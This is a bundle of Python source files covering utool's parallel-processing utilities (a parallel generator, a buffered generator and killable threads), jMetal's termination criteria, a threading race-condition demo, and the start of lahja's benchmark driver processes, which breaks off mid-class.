>>> import utool as ut
>>> from wbia.algo.preproc.preproc_chip import gen_chip
>>> import cv2
>>> from utool.util_parallel import __testwarp
>>> key_list = ['grace.jpg', 'easy1.png', 'ada2.jpg', 'easy3.png',
>>> 'hard3.png', 'zebra.png', 'patsy.jpg', 'ada.jpg',
>>> 'carl.jpg', 'lena.png', 'easy2.png']
>>> img_fpath_list = [ut.grab_test_imgpath(key) for key in key_list]
>>> arg_list1 = [(vt.imread(fpath),) for fpath in img_fpath_list[0:1]]
>>> arg_list2 = [(vt.imread(fpath),) for fpath in img_fpath_list]
>>> #new1 = [x for x in ut.generate2(__testwarp, arg_list1)]
>>> new1 = __testwarp(arg_list1[0])
>>> new2 = [y for y in ut.generate2(__testwarp, arg_list2, force_serial=False)]
>>> #print('new2 = %r' % (new2,))
#Example:
# >>> # Freakin weird. When IBEIS Runs generate it doesn't close the processes
# >>> # UNSTABLE_DOCTEST
# >>> # python -m utool.util_parallel --test-generate:4
# >>> # Trying to see if we can recreate the problem where there are
# >>> # defunct python processes
# >>> import utool as ut
# >>> #num = 8700 # parallel is slower for smaller numbers
# >>> num = 70000 # parallel has an initial (~.1 second startup overhead)
# >>> print('TESTING PARALLEL')
# >>> flag_generator1 = list(ut.generate2(ut.is_prime, range(0, num)))
# >>> flag_generator1 = list(ut.generate2(ut.is_prime, range(0, num)))
# >>> import time
# >>> time.sleep(10)
"""
if verbose is None:
verbose = 2
if ntasks is None:
ntasks = nTasks
if ntasks is None:
try:
ntasks = len(args_gen)
except TypeError:
# Cast to a list
args_gen = list(args_gen)
ntasks = len(args_gen)
if ntasks == 1 or ntasks < __MIN_PARALLEL_TASKS__:
force_serial = True
if __FORCE_SERIAL__:
force_serial = __FORCE_SERIAL__
if ntasks == 0:
if verbose:
print('[ut.generate2] submitted 0 tasks')
return
if nprocs is None:
nprocs = min(ntasks, get_default_numprocs())
if nprocs == 1:
force_serial = True
if kw_gen is None:
kw_gen = [{}] * ntasks
if isinstance(kw_gen, dict):
# kw_gen can be a single dict applied to everything
kw_gen = [kw_gen] * ntasks
if force_serial:
for result in _generate_serial2(
func, args_gen, kw_gen, ntasks=ntasks, progkw=progkw, verbose=verbose
):
yield result
else:
if verbose:
gentype = 'mp' if use_pool else 'futures'
fmtstr = '[generate2] executing {} {} tasks using {} {} procs'
print(fmtstr.format(ntasks, get_funcname(func), nprocs, gentype))
if verbose > 1:
lbl = '(pargen) %s: ' % (get_funcname(func),)
progkw_ = dict(freq=None, bs=True, adjust=False, freq_est='absolute')
progkw_.update(progkw)
# print('progkw_.update = {!r}'.format(progkw_.update))
progpart = util_progress.ProgPartial(length=ntasks, lbl=lbl, **progkw_)
if use_pool:
# Use multiprocessing
if chunksize is None:
chunksize = max(min(4, ntasks), min(8, ntasks // (nprocs ** 2)))
try:
pool = multiprocessing.Pool(nprocs)
if ordered:
pmap_func = pool.imap
else:
pmap_func = pool.imap_unordered
wrapped_arg_gen = zip([func] * len(args_gen), args_gen, kw_gen)
res_gen = pmap_func(_kw_wrap_worker, wrapped_arg_gen, chunksize)
if verbose > 1:
res_gen = progpart(res_gen)
for res in res_gen:
yield res
finally:
pool.close()
pool.join()
else:
if futures_threaded:
executor_cls = futures.ThreadPoolExecutor
else:
executor_cls = futures.ProcessPoolExecutor
# Use futures
executor = executor_cls(nprocs)
try:
fs_list = [
executor.submit(func, *a, **k) for a, k in zip(args_gen, kw_gen)
]
fs_gen = fs_list
if not ordered:
fs_gen = futures.as_completed(fs_gen)
if verbose > 1:
fs_gen = progpart(fs_gen)
for fs in fs_gen:
yield fs.result(timeout=timeout)
finally:
executor.shutdown(wait=True)
def _kw_wrap_worker(func_args_kw):
func, args, kw = func_args_kw
return func(*args, **kw)
def _generate_serial2(
func, args_gen, kw_gen=None, ntasks=None, progkw={}, verbose=None, nTasks=None
):
"""internal serial generator"""
if verbose is None:
verbose = 2
if ntasks is None:
ntasks = nTasks
if ntasks is None:
ntasks = len(args_gen)
if verbose > 0:
print(
'[ut._generate_serial2] executing %d %s tasks in serial'
% (ntasks, get_funcname(func))
)
# kw_gen can be a single dict applied to everything
if kw_gen is None:
kw_gen = [{}] * ntasks
if isinstance(kw_gen, dict):
kw_gen = [kw_gen] * ntasks
# Get iterator with or without progress
if verbose > 1:
lbl = '(sergen) %s: ' % (get_funcname(func),)
progkw_ = dict(freq=None, bs=True, adjust=False, freq_est='between')
progkw_.update(progkw)
args_gen = util_progress.ProgIter(args_gen, length=ntasks, lbl=lbl, **progkw_)
for args, kw in zip(args_gen, kw_gen):
result = func(*args, **kw)
yield result
def set_num_procs(num_procs):
global __NUM_PROCS__
__NUM_PROCS__ = num_procs
def in_main_process():
"""
Returns True if executing in the main process (i.e. not in a multiprocessing subprocess)
Useful to disable init print messages on windows
"""
return multiprocessing.current_process().name == 'MainProcess'
def get_sys_thread_limit():
import utool as ut
if ut.LINUX:
out, err, ret = ut.cmd('ulimit', '-u', verbose=False, quiet=True, shell=True)
else:
raise NotImplementedError('')
def get_default_numprocs():
if __NUM_PROCS__ is not None:
return __NUM_PROCS__
# if WIN32:
# num_procs = 3 # default windows to 3 processes for now
# else:
# num_procs = max(multiprocessing.cpu_count() - 2, 1)
num_procs = max(multiprocessing.cpu_count() - 1, 1)
return num_procs
def init_worker():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def __testwarp(tup):
# THIS DOES NOT CAUSE A PROBLEM FOR SOME FREAKING REASON
import cv2
import numpy as np
try:
import vtool as vt
except ImportError:
import vtool as vt
img = tup[0]
M = vt.rotation_mat3x3(0.1)[0:2].dot(vt.translation_mat3x3(-10, 10))
# new = cv2.warpAffine(img, M[0:2], (500, 500), flags=cv2.INTER_LANCZOS4,
# borderMode=cv2.BORDER_CONSTANT)
# ONLY FAILS WHEN OUTPUT SIZE IS LARGE
# dsize = (314, 314) # (313, 313) does not cause the error
dsize = (500, 500) # (313, 313) does not cause the error
dst = np.empty(dsize[::-1], dtype=img.dtype)
# new = cv2.warpAffine(img, M[0:2], dsize)
print('Warping?')
new = cv2.warpAffine(img, M[0:2], dsize, dst)
print(dst is new)
return new
def _test_buffered_generator():
"""
Test for standard python calls
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator
Example:
>>> # DISABLE_DOCTEST
>>> import utool as ut
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _test_buffered_generator # NOQA
>>> _test_buffered_generator()
"""
import utool as ut
# ---- Func and Sleep Definitions
args = [346373] # 38873
func = ut.is_prime
def sleepfunc(prime=args[0]):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 10.0)
def _test_buffered_generator2():
"""
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator2
It takes roughly time_thresh=15s (about 350 iterations) for the buffered
version to outperform serial.
Test for numpy calls
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> _test_buffered_generator2()
"""
import numpy as np
# import utool as ut
# ---- Func and Sleep Definitions
from functools import partial
rng = np.random.RandomState(0)
args = [rng.rand(256, 256) for _ in range(32)] # 38873
func = partial(np.divide, 4.3)
def sleepfunc(prime=346373):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 15.0)
def _test_buffered_generator3():
"""
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator3
This test suggests that a ut.buffered_generator is better for disk IO than
ut.generate
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> _test_buffered_generator3()
"""
try:
import vtool as vt
except ImportError:
import vtool as vt
import utool as ut
# ---- Func and Sleep Definitions
args = list(map(ut.grab_test_imgpath, ut.get_valid_test_imgkeys()))
func = vt.imread
def sleepfunc(prime=346373):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 4.0)
def _test_buffered_generator_general(
func,
args,
sleepfunc,
target_looptime=1.0,
serial_cheat=1,
argmode=False,
buffer_size=2,
):
"""
# We are going to generate output of func in the background while sleep
# func is running in the foreground
# --- Hyperparams
target_looptime = 1.5 # maximum time to run all loops
"""
import utool as ut
# serial_cheat = 1 # approx division factor to run serial less times
show_serial = True # target_looptime < 10. # 3.0
with ut.Timer('One* call to func') as t_fgfunc:
results = [func(arg) for arg in args]
functime = t_fgfunc.ellapsed / len(args)
# sleepfunc = ut.is_prime
with ut.Timer('One* call to sleep func') as t_sleep:
if argmode:
[sleepfunc(x) for x in results]
else:
[sleepfunc() for x in results]
sleeptime = t_sleep.ellapsed / len(args)
# compute amount of loops to run
_num_loops = round(target_looptime // (functime + sleeptime))
num_data = int(_num_loops // len(args))
num_loops = int(num_data * len(args))
serial_cheat = min(serial_cheat, num_data)
data = ut.flatten([args] * num_data)
est_tsleep = sleeptime * num_loops
est_tfunc = functime * num_loops
est_needed_buffers = sleeptime / functime
print(
'Estimated stats'
+ ut.repr4(
ut.dict_subset(
locals(),
[
'num_loops',
'functime',
'sleeptime',
'est_tsleep',
'est_tfunc',
'serial_cheat',
'buffer_size',
'est_needed_buffers',
],
)
)
)
if show_serial:
with ut.Timer('serial') as t1:
# cheat for serial to make it go faster
for x in map(func, data[: len(data) // serial_cheat]):
if argmode:
sleepfunc(x)
else:
sleepfunc()
t_serial = serial_cheat * t1.ellapsed
print("...toc('adjusted_serial') = %r" % (t_serial))
with ut.Timer('ut.buffered_generator') as t2:
gen_ = ut.buffered_generator(map(func, data), buffer_size=buffer_size)
for x in gen_:
if argmode:
sleepfunc(x)
else:
sleepfunc()
with ut.Timer('ut.generate') as t3:
gen_ = ut.generate2(func, zip(data), chunksize=buffer_size, quiet=1, verbose=0)
for x in gen_:
if argmode:
sleepfunc(x)
else:
sleepfunc()
# Compare theoretical vs practical efficiency
print('\n Theoretical Results')
def parallel_efficiency(ellapsed, est_tsleep, est_tfunc):
return (1 - ((ellapsed - est_tsleep) / est_tfunc)) * 100
if show_serial:
print(
'Theoretical gain (serial) = %.3f%%'
% (parallel_efficiency(t_serial, est_tsleep, est_tfunc),)
)
print(
'Theoretical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tsleep, est_tfunc),)
)
print(
'Theoretical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tsleep, est_tfunc),)
)
if show_serial:
prac_tfunc = t_serial - est_tsleep
print('\n Practical Results')
print(
'Practical gain (serial) = %.3f%%'
% (parallel_efficiency(t1.ellapsed, est_tsleep, prac_tfunc),)
)
print(
'Practical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tsleep, prac_tfunc),)
)
print(
'Practical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tsleep, prac_tfunc),)
)
def _test_buffered_generator_general2(
bgfunc,
bgargs,
fgfunc,
target_looptime=1.0,
serial_cheat=1,
buffer_size=2,
show_serial=True,
):
"""
# We are going to generate output of bgfunc in the background while
# fgfunc is running in the foreground. fgfunc takes results of bffunc as
# args.
# --- Hyperparams
target_looptime = 1.5 # maximum time to run all loops
"""
import utool as ut
with ut.Timer('One* call to bgfunc') as t_bgfunc:
results = [bgfunc(arg) for arg in bgargs]
bgfunctime = t_bgfunc.ellapsed / len(bgargs)
# fgfunc = ut.is_prime
with ut.Timer('One* call to fgfunc') as t_fgfunc:
[fgfunc(x) for x in results]
fgfunctime = t_fgfunc.ellapsed / len(bgargs)
# compute amount of loops to run
est_looptime = bgfunctime + fgfunctime
_num_loops = round(target_looptime // est_looptime)
num_data = int(_num_loops // len(bgargs))
num_loops = int(num_data * len(bgargs))
serial_cheat = min(serial_cheat, num_data)
data = ut.flatten([bgargs] * num_data)
est_tfg = fgfunctime * num_loops
est_tbg = bgfunctime * num_loops
est_needed_buffers = fgfunctime / bgfunctime
print(
'Estimated stats'
+ ut.repr4(
ut.dict_subset(
locals(),
[
'num_loops',
'bgfunctime',
'fgfunctime',
'est_tfg',
'est_tbg',
'serial_cheat',
'buffer_size',
'est_needed_buffers',
],
)
)
)
if show_serial:
with ut.Timer('serial') as t1:
# cheat for serial to make it go faster
for x in map(bgfunc, data[: len(data) // serial_cheat]):
fgfunc(x)
t_serial = serial_cheat * t1.ellapsed
print("...toc('adjusted_serial') = %r" % (t_serial))
with ut.Timer('ut.buffered_generator') as t2:
gen_ = ut.buffered_generator(map(bgfunc, data), buffer_size=buffer_size)
for x in gen_:
fgfunc(x)
with ut.Timer('ut.generate') as t3:
gen_ = ut.generate2(bgfunc, zip(data), chunksize=buffer_size, quiet=1, verbose=0)
for x in gen_:
fgfunc(x)
# Compare theoretical vs practical efficiency
print('\n Theoretical Results')
def parallel_efficiency(ellapsed, est_tfg, est_tbg):
return (1 - ((ellapsed - est_tfg) / est_tbg)) * 100
if show_serial:
print(
'Theoretical gain (serial) = %.3f%%'
% (parallel_efficiency(t_serial, est_tfg, est_tbg),)
)
print(
'Theoretical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tfg, est_tbg),)
)
print(
'Theoretical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tfg, est_tbg),)
)
if show_serial:
prac_tbg = t_serial - est_tfg
print('\n Practical Results')
print(
'Practical gain (serial) = %.3f%%'
% (parallel_efficiency(t1.ellapsed, est_tfg, prac_tbg),)
)
print(
'Practical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tfg, prac_tbg),)
)
print(
'Practical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tfg, prac_tbg),)
)
def bgfunc(path):
# Test for /_test_buffered_generator_img
# import utool as ut
try:
import vtool as vt
except ImportError:
import vtool as vt
for _ in range(1):
img = vt.imread(path)
img = img ** 1.1
# [ut.is_prime(346373) for _ in range(2)]
return img
def _test_buffered_generator_img():
"""
Test for buffering image read calls
CONCLUSIONS:
Use buffer when bgtime is bigger, but comparable to fgtime
Use buffer when fgtime < bgtime and (fgtime + bgtime) is large
Use generate when fgtime > bgtime and (fgtime + bgtime) is large
Use serial when fgtime is bigger and all parts are comparatively small
Buffer size should be roughly bgtime / fgtime
Buffering also has a much more even and regular cpu demand.
Also demands less cpus (I think)
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator_img
Example:
>>> # DISABLE_DOCTEST
>>> import utool as ut
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _test_buffered_generator_img # NOQA
>>> from utool.util_parallel import _test_buffered_generator_general2 # NOQA
>>> _test_buffered_generator_img()
"""
import utool as ut
args = [
ut.grab_test_imgpath(key) for key in ut.util_grabdata.get_valid_test_imgkeys()
]
# import cv2
# func = cv2.imread
# bffunc = vt.imread
def sleepfunc_bufwin(x, niters=10):
# import cv2
for z in range(niters):
# operate on image in some capacity
x.cumsum()
for z in range(2):
x ** 1.1
return x
target_looptime = 60.0
# target_looptime = 20.0
# target_looptime = 10.0
# target_looptime = 5.0
serial_cheat = 1
_test_buffered_generator_general2(
bgfunc,
args,
sleepfunc_bufwin,
target_looptime,
serial_cheat,
buffer_size=4,
show_serial=False,
)
# _test_buffered_generator_general2(bgfunc, args, sleepfunc_bufwin, target_looptime, serial_cheat, buffer_size=4, show_serial=True)
def buffered_generator(source_gen, buffer_size=2, use_multiprocessing=False):
r"""
Generator that runs a slow source generator in a separate process.
My generate function still seems faster on test cases.
However, this function is more flexible in its compatibility.
Args:
source_gen (iterable): slow generator
buffer_size (int): the maximal number of items to pre-generate
(length of the buffer) (default = 2)
use_multiprocessing (bool): if False uses GIL-hindered threading
instead of multiprocessing (default = False).
Note:
use_multiprocessing = True seems to freeze if passed in a generator
built by six.moves.map.
References:
Taken from Sander Dieleman's data augmentation pipeline
https://github.com/benanne/kaggle-ndsb/blob/11a66cdbddee16c69514b9530a727df0ac6e136f/buffering.py
CommandLine:
python -m utool.util_parallel --test-buffered_generator:0
python -m utool.util_parallel --test-buffered_generator:1
Ignore:
>>> #functime = timeit.timeit(
>>> # 'ut.is_prime(' + str(prime) + ')', setup='import utool as ut',
>>> # number=500) / 1000.0
Example:
>>> # DISABLE_DOCTEST
>>> # UNSTABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> import utool as ut
>>> num = 2 ** 14
>>> func = ut.is_prime
>>> data = [38873] * num
>>> data = list(range(num))
>>> with ut.Timer('serial') as t1:
... result1 = list(map(func, data))
>>> with ut.Timer('ut.generate2') as t3:
... result3 = list(ut.generate2(func, zip(data), chunksize=2, quiet=1, verbose=0))
>>> with ut.Timer('ut.buffered_generator') as t2:
... result2 = list(ut.buffered_generator(map(func, data)))
>>> assert len(result1) == num and len(result2) == num and len(result3) == num
>>> assert result3 == result2, 'inconsistent results'
>>> assert result1 == result2, 'inconsistent results'
Example:
>>> # DISABLE_DOCTEST
>>> # VERYSLLOOWWW_DOCTEST
>>> from utool.util_parallel import _test_buffered_generator2
>>> _test_buffered_generator2()
"""
if buffer_size < 2:
raise RuntimeError('Minimal buffer_size is 2!')
if use_multiprocessing:
print('WARNING seems to freeze if passed in a generator')
# assert False, 'dont use this buffered multiprocessing'
if False:
pool = multiprocessing.Pool(
processes=get_default_numprocs(),
initializer=init_worker,
maxtasksperchild=None,
)
Process = pool.Process
else:
Process = multiprocessing.Process
_Queue = multiprocessing.Queue
target = _buffered_generation_process
else:
_Queue = queue.Queue
Process = KillableThread
target = _buffered_generation_thread
# the effective buffer_ size is one less, because the generation process
# will generate one extra element and block until there is room in the
# buffer_.
buffer_ = _Queue(maxsize=buffer_size - 1)
# previously None was used as a sentinel, which fails when source_gen
# generates None; we need an object that the source will never produce.
# A reasonable hack is to use the StopIteration type itself instead
sentinal = StopIteration
process = Process(target=target, args=(iter(source_gen), buffer_, sentinal))
# if not use_multiprocessing:
process.daemon = True
process.start()
while True:
# output = buffer_.get(timeout=1.0)
output = buffer_.get()
if output is sentinal:  # the sentinel is the StopIteration class itself, so compare by identity
return
yield output
# _iter = iter(buffer_.get, sentinal)
# for data in _iter:
# if debug:
# print('Yeidling')
# yield data
def _buffered_generation_thread(source_gen, buffer_, sentinal):
"""helper for buffered_generator"""
for data in source_gen:
buffer_.put(data, block=True)
# sentinel: signal the end of the iterator
buffer_.put(sentinal)
def _buffered_generation_process(source_gen, buffer_, sentinal):
"""helper for buffered_generator"""
for data in source_gen:
buffer_.put(data, block=True)
# sentinel: signal the end of the iterator
buffer_.put(sentinal)
# unfortunately this does not suffice as a signal: if buffer_.get() was
# called and subsequently the buffer_ is closed, it will block forever.
buffer_.close()
def spawn_background_process(func, *args, **kwargs):
"""
Run a function in the background
(like rebuilding some costly data structure)
References:
http://stackoverflow.com/questions/2046603/is-it-possible-to-run-function-in-a-subprocess-without-threading-or-writing-a-se
http://stackoverflow.com/questions/1196074/starting-a-background-process-in-python
http://stackoverflow.com/questions/15063963/python-is-thread-still-running
Args:
func (function):
CommandLine:
python -m utool.util_parallel --test-spawn_background_process
Example:
>>> # DISABLE_DOCTEST
>>> # SLOW_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> import utool as ut
>>> import time
>>> from os.path import join
>>> # build test data
>>> fname = 'test_bgfunc_output.txt'
>>> dpath = ut.get_app_resource_dir('utool')
>>> ut.ensuredir(dpath)
>>> fpath = join(dpath, fname)
>>> # ensure file is not around
>>> sleep_time = 1
>>> ut.delete(fpath)
>>> assert not ut.checkpath(fpath, verbose=True)
>>> def background_func(fpath, sleep_time):
... import utool as ut
... import time
... print('[BG] Background Process has started')
... time.sleep(sleep_time)
... print('[BG] Background Process is writing')
... ut.write_to(fpath, 'background process')
... print('[BG] Background Process has finished')
... #raise AssertionError('test exception')
>>> # execute function
>>> func = background_func
>>> args = (fpath, sleep_time)
>>> kwargs = {}
>>> print('[FG] Spawning process')
>>> threadid = ut.spawn_background_process(func, *args, **kwargs)
>>> assert threadid.is_alive() is True, 'thread should be active'
>>> print('[FG] Spawned process. threadid=%r' % (threadid,))
>>> # background process should not have finished yet
>>> assert not ut.checkpath(fpath, verbose=True)
>>> print('[FG] Waiting to check')
>>> time.sleep(sleep_time + .1)
>>> print('[FG] Finished waiting')
>>> # Now the file should be there
>>> assert ut.checkpath(fpath, verbose=True)
>>> assert threadid.is_alive() is False, 'process should have died'
"""
import utool as ut
func_name = ut.get_funcname(func)
name = 'mp.Progress-' + func_name
# proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs)
proc_obj = KillableProcess(target=func, name=name, args=args, kwargs=kwargs)
# proc_obj.daemon = True
# proc_obj.isAlive = proc_obj.is_alive
proc_obj.start()
return proc_obj
class KillableProcess(multiprocessing.Process):
"""
Simple subclass of multiprocessing.Process
Gives an additional method to kill all children
as well as itself. calls this function on delete.
DEPRECATE, do not kill processes. It is not a good idea.
It can cause deadlocks.
"""
# def __del__(self):
# self.terminate2()
# super(KillableProcess, self).__del__()
def terminate2(self):
if self.is_alive():
# print('[terminate2] Killing process')
# Kill all children
import psutil
os_proc = psutil.Process(pid=self.pid)
for child in os_proc.children():
child.terminate()
self.terminate()
else:
# print('[terminate2] Already dead')
pass
# def _process_error_wraper(queue, func, args, kwargs):
# pass
# def spawn_background_process2(func, *args, **kwargs):
# multiprocessing_queue
# import utool as ut
# func_name = ut.get_funcname(func)
# name = 'mp.Progress-' + func_name
# proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs)
# #proc_obj.isAlive = proc_obj.is_alive
# proc_obj.start()
def _async_raise(tid, excobj):
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(excobj))
if res == 0:
raise ValueError('nonexistent thread id')
elif res > 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError('PyThreadState_SetAsyncExc failed')
class KillableThread(threading.Thread):
"""
DEPRECATE, do not kill threads. It is not a good idea.
It can cause deadlocks.
References:
http://code.activestate.com/recipes/496960-thread2-killable-threads/
http://tomerfiliba.com/recipes/Thread2/
"""
def raise_exc(self, excobj):
assert self.is_alive(), 'thread must be started'
for tid, tobj in threading._active.items():
if tobj is self:
_async_raise(tid, excobj)
return
# the thread was alive when we entered the loop, but was not found
# in the dict, hence it must have been already terminated. should we raise
# an exception here? silently ignore?
def terminate(self):
# must raise the SystemExit type, instead of a SystemExit() instance
# due to a bug in PyThreadState_SetAsyncExc
try:
self.raise_exc(SystemExit)
except ValueError:
pass
def spawn_background_thread(func, *args, **kwargs):
# threadobj = IMPLEMENTATION_NUM
thread_obj = KillableThread(target=func, args=args, kwargs=kwargs)
thread_obj.start()
return thread_obj
def spawn_background_daemon_thread(func, *args, **kwargs):
# threadobj = IMPLEMENTATION_NUM
thread_obj = KillableThread(target=func, args=args, kwargs=kwargs)
thread_obj.daemon = True
thread_obj.start()
return thread_obj
if __name__ == '__main__':
"""
Ignore:
timing things
python reset_dbs.py --time-generate
python reset_dbs.py --time-generate --force-serial
python reset_dbs.py --time-generate --preinit
python reset_dbs.py --time-generate --force-serial
CommandLine:
python -m utool.util_parallel
python -m utool.util_parallel --allexamples --testslow
coverage run -m utool.util_parallel --allexamples
coverage run -m utool.util_parallel --allexamples --testslow
coverage report html -m utool/util_parallel.py
coverage html
"""
# import multiprocessing
multiprocessing.freeze_support() # for win32
import utool # NOQA
utool.doctest_funcs()
|
termination_criterion.py
|
import threading
from abc import ABC, abstractmethod
from jmetal.core.observer import Observer
from jmetal.core.quality_indicator import QualityIndicator
"""
.. module:: termination_criterion
:platform: Unix, Windows
:synopsis: Implementation of stopping conditions.
.. moduleauthor:: Antonio Benítez-Hidalgo <antonio.b@uma.es>
"""
class TerminationCriterion(Observer, ABC):
@abstractmethod
def update(self, *args, **kwargs):
pass
@property
@abstractmethod
def is_met(self):
pass
class StoppingByEvaluations(TerminationCriterion):
def __init__(self, max_evaluations: int):
super(StoppingByEvaluations, self).__init__()
self.max_evaluations = max_evaluations
self.evaluations = 0
def update(self, *args, **kwargs):
self.evaluations = kwargs['EVALUATIONS']
@property
def is_met(self):
return self.evaluations >= self.max_evaluations
class StoppingByTime(TerminationCriterion):
def __init__(self, max_seconds: int):
super(StoppingByTime, self).__init__()
self.max_seconds = max_seconds
self.seconds = 0.0
def update(self, *args, **kwargs):
self.seconds = kwargs['COMPUTING_TIME']
@property
def is_met(self):
return self.seconds >= self.max_seconds
def key_has_been_pressed(stopping_by_keyboard):
input('PRESS ANY KEY + ENTER: ')
stopping_by_keyboard.key_pressed = True
class StoppingByKeyboard(TerminationCriterion):
def __init__(self):
super(StoppingByKeyboard, self).__init__()
self.key_pressed = False
thread = threading.Thread(target=key_has_been_pressed, args=(self,))
thread.start()
def update(self, *args, **kwargs):
pass
@property
def is_met(self):
return self.key_pressed
class StoppingByQualityIndicator(TerminationCriterion):
def __init__(self, quality_indicator: QualityIndicator, expected_value: float, degree: float):
super(StoppingByQualityIndicator, self).__init__()
self.quality_indicator = quality_indicator
self.expected_value = expected_value
self.degree = degree
self.value = 0.0
def update(self, *args, **kwargs):
solutions = kwargs['SOLUTIONS']
if solutions:
self.value = self.quality_indicator.compute([s.objectives for s in solutions])
@property
def is_met(self):
if self.quality_indicator.is_minimization:
met = self.value * self.degree < self.expected_value
else:
met = self.value * self.degree > self.expected_value
return met
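# Hedged usage sketch (not part of the original module): an algorithm would
# typically feed its progress into the criterion via update() and poll is_met.
if __name__ == '__main__':
    criterion = StoppingByEvaluations(max_evaluations=100)
    evaluations = 0
    while not criterion.is_met:
        evaluations += 1  # one hypothetical evaluation of the problem
        criterion.update(EVALUATIONS=evaluations)
    print('stopped after', criterion.evaluations, 'evaluations')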
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for a in range(0, 1000000):
i = i + 1
def decrementingFunction():
global i
for a in range(0, 1000000):
i = i - 1
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
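# Hedged aside (not part of the original script): the printed value is rarely 0
# because `i = i + 1` is a read-modify-write that the two threads can interleave.
# A minimal lock-protected variant of the increment loop, for comparison:
#
#     from threading import Lock
#     lock = Lock()
#
#     def incrementingFunctionSafe():
#         global i
#         for a in range(0, 1000000):
#             with lock:
#                 i = i + 1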
|
process.py
|
from abc import ABC, abstractmethod
import itertools
import logging
import multiprocessing
import os
import signal
import time
from typing import Any, AsyncGenerator, List, NamedTuple, Optional, Tuple # noqa: F401
from lahja import BroadcastConfig, ConnectionConfig
from lahja.base import EndpointAPI
from lahja.tools.benchmark.backends import BaseBackend
from lahja.tools.benchmark.constants import (
DRIVER_ENDPOINT,
REPORTER_ENDPOINT,
ROOT_ENDPOINT,
)
from lahja.tools.benchmark.logging import setup_stderr_lahja_logging
from lahja.tools.benchmark.stats import GlobalStatistic, LocalStatistic
from lahja.tools.benchmark.typing import (
PerfMeasureEvent,
PerfMeasureRequest,
PerfMeasureResponse,
RawMeasureEntry,
ShutdownEvent,
TotalRecordedEvent,
)
from lahja.tools.benchmark.utils.reporting import print_full_report
class DriverProcessConfig(NamedTuple):
num_events: int
connected_endpoints: Tuple[ConnectionConfig, ...]
throttle: float
payload_bytes: int
backend: BaseBackend
debug_logging: bool
class BaseDriverProcess(ABC):
logger = logging.getLogger("lahja.tools.benchmark.process.DriverProcess")
def __init__(self, config: DriverProcessConfig) -> None:
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._config,), daemon=True
)
self._process.start()
def stop(self) -> None:
if self._process is None:
raise Exception("no process")
elif self._process.pid is not None:
os.kill(self._process.pid, signal.SIGINT)
else:
self._process.terminate()
        self._process.join(1)
        if self._process.is_alive():
            # Process.join() does not raise on timeout, so check explicitly
            # before falling back to terminate().
            self._process.terminate()
            self._process.join(1)
@classmethod
def launch(cls, config: DriverProcessConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
try:
config.backend.run(cls.worker, config)
except KeyboardInterrupt:
return
@classmethod
async def worker(cls, config: DriverProcessConfig) -> None:
conn_config = ConnectionConfig.from_name(DRIVER_ENDPOINT)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(*config.connected_endpoints)
await cls.do_driver(event_bus, config)
@staticmethod
@abstractmethod
async def do_driver(event_bus: EndpointAPI, config: DriverProcessConfig) -> None:
...
class BroadcastDriver(BaseDriverProcess):
@staticmethod
async def do_driver(event_bus: EndpointAPI, config: DriverProcessConfig) -> None:
for consumer in config.connected_endpoints:
await event_bus.wait_until_endpoint_subscribed_to(
consumer.name, PerfMeasureEvent
)
counter = itertools.count()
payload = b"\x00" * config.payload_bytes
while True:
await config.backend.sleep(config.throttle)
await event_bus.broadcast(
PerfMeasureEvent(payload, next(counter), time.time())
)
class RequestDriver(BaseDriverProcess):
@classmethod
async def do_driver(
cls, event_bus: EndpointAPI, config: DriverProcessConfig
) -> None:
for consumer in config.connected_endpoints:
await event_bus.wait_until_endpoint_subscribed_to(
consumer.name, PerfMeasureRequest
)
counter = itertools.count()
payload = b"\x00" * config.payload_bytes
while True:
await config.backend.sleep(config.throttle)
await event_bus.request(
PerfMeasureRequest(payload, next(counter), time.time())
)
class ConsumerConfig(NamedTuple):
num_events: int
backend: BaseBackend
debug_logging: bool
class BaseConsumerProcess(ABC):
